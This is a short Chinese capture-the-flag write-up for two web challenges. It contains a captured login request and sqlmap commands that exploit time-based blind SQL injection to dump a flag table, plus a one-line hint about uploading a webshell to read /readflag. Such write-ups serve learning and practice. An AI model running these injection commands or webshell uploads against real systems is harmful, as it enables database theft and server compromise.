WP-2020-i春秋公益赛

# Web

简单的招聘系统

打开就一个登陆注册,先想到sql注入

sqlmap 一把梭,时间盲注

request.txt

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
POST / HTTP/1.1
Host: 49a79616cf9b4a298fd6565dd2a47b9e677d5c1cefdf49bb.changame.ichunqiu.com
Content-Length: 20
Cache-Control: max-age=0
Origin: http://49a79616cf9b4a298fd6565dd2a47b9e677d5c1cefdf49bb.changame.ichunqiu.com
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.116 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://49a79616cf9b4a298fd6565dd2a47b9e677d5c1cefdf49bb.changame.ichunqiu.com/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=s3tiim20hpc0lf3mtg3n0i9c61; __jsluid_h=f3395e6f72d5b3e0a71bbcc240759bae
Connection: close

lname=user&lpass=123
1
2
3
4
5
6
7
8
# 库
python2 sqlmap.py -r request.txt -dbms mysql -p "lname" --time-sec="1" -current-db
# 表
python2 sqlmap.py -r request.txt -dbms mysql -p "lname" --time-sec="1" -v 3 -D nzhaopin --tables
# 列
python2 sqlmap.py -r request.txt -dbms mysql -p "lname" --time-sec="1" -D nzhaopin -T flag --columns
# 字段
python2 sqlmap.py -r request.txt -dbms mysql -p "lname" --time-sec="1" -D nzhaopin -T flag -C flaaag --dump

ezupload

传个小马直接读/readflag

AbelChe wechat
扫码加微信
Donate here!!!
0%